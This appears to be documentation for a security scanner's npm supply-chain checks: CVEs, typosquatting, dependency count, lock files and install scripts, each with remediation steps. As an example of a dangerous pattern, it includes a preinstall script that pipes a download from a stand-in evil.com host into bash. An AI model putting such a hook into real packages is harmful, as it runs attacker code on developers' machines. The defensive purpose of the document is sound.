Supply Chain Security Checks

Supply chain security checks identify risks in your project's dependencies, including known vulnerabilities, typosquatting attempts, and suspicious package behaviors.

supply-chain-cve

Severity: Critical

What It Detects

Known vulnerabilities (CVEs) in your dependencies using the OSV (Open Source Vulnerabilities) database.

Why It's Dangerous

Dependencies with known CVEs can:

Contain remote code execution vulnerabilities
Allow denial of service attacks
Leak sensitive information
Be actively exploited in the wild

Example Finding

Package: lodash@4.17.15
CVE: CVE-2020-8203
Severity: High
Description: Prototype pollution vulnerability

How to Fix

# Update the specific package
npm update lodash
 
# Or update all packages
npm update
 
# Check for available updates
npm outdated
 
# For major version updates
npm install lodash@latest

supply-chain-typosquat

Severity: High

What It Detects

Packages with names similar to popular packages, which may be typosquatting attempts:

Character substitution (lodash vs l0dash)
Missing/extra characters (express vs expres)
Hyphen variations (react-dom vs reactdom)

Why It's Dangerous

Typosquatted packages can:

Contain malicious code
Steal credentials
Install backdoors
Mine cryptocurrency

Example Finding

Package: expresss (note extra 's')
Similar to: express (popular package)
Action: Verify this is the intended package

How to Fix

Verify package names before installing
Check npm page for package legitimacy
Compare download counts with known packages
Remove suspicious packages:

npm uninstall expresss
npm install express

supply-chain-excessive-deps

Severity: Medium

What It Detects

Projects with a high number of dependencies:

Warning at 50+ production dependencies
Warning at 100+ total dependencies

Why It's Concerning

Many dependencies:

Increase attack surface
More potential vulnerabilities
Harder to audit and update
Slower install/build times

How to Address

# Analyze dependency tree
npm ls --depth=0
 
# Find unused dependencies
npx depcheck
 
# Remove unused packages
npm uninstall unused-package

Consider:

Consolidating overlapping functionality
Using built-in Node.js APIs where possible
Evaluating if each dependency is necessary

supply-chain-lockfile

Severity: Medium

What It Detects

Missing or inconsistent lock files:

No package-lock.json or yarn.lock
Lock file out of sync with package.json

Why It's Important

Lock files ensure:

Reproducible builds
Same versions across environments
Protection against dependency confusion
Verification of package integrity

How to Fix

# Generate lock file
npm install
 
# Commit the lock file
git add package-lock.json
git commit -m "Add package-lock.json"

supply-chain-scripts

Severity: High

What It Detects

Suspicious package scripts in package.json:

preinstall scripts that run before installation
postinstall scripts that run arbitrary code
Scripts that download or execute external resources

Why It's Dangerous

Malicious scripts can:

Execute during npm install
Run before you review the code
Download and execute malware
Steal environment variables

Example Dangerous Scripts

{
  "scripts": {
    "preinstall": "curl http://evil.com/malware.sh | bash",
    "postinstall": "node ./setup.js"
  }
}

How to Address

Review scripts before installing
Use npm install --ignore-scripts initially
Audit setup.js or similar scripts
Consider if the script is necessary

| Check | Severity | Key Fix | |-------|----------|---------| | supply-chain-cve | Critical | Update vulnerable dependencies | | supply-chain-typosquat | High | Verify package names | | supply-chain-excessive-deps | Medium | Reduce unnecessary dependencies | | supply-chain-lockfile | Medium | Commit lock files | | supply-chain-scripts | High | Review package scripts |

Best Practices

1. Regular Updates

# Check for updates weekly
npm outdated
 
# Update regularly
npm update

2. Use npm Audit

# Check for vulnerabilities
npm audit
 
# Auto-fix where possible
npm audit fix

3. Lock Dependencies

{
  "engines": {
    "node": ">=18.0.0"
  }
}

4. Review New Dependencies

Before adding a package:

Check npm download counts
Review GitHub stars and activity
Look at the maintainer's reputation
Scan for known vulnerabilities

Next Steps

MCP TypeScript - MCP-specific checks
Python Security - Python patterns
Reviewing Findings - How to fix issues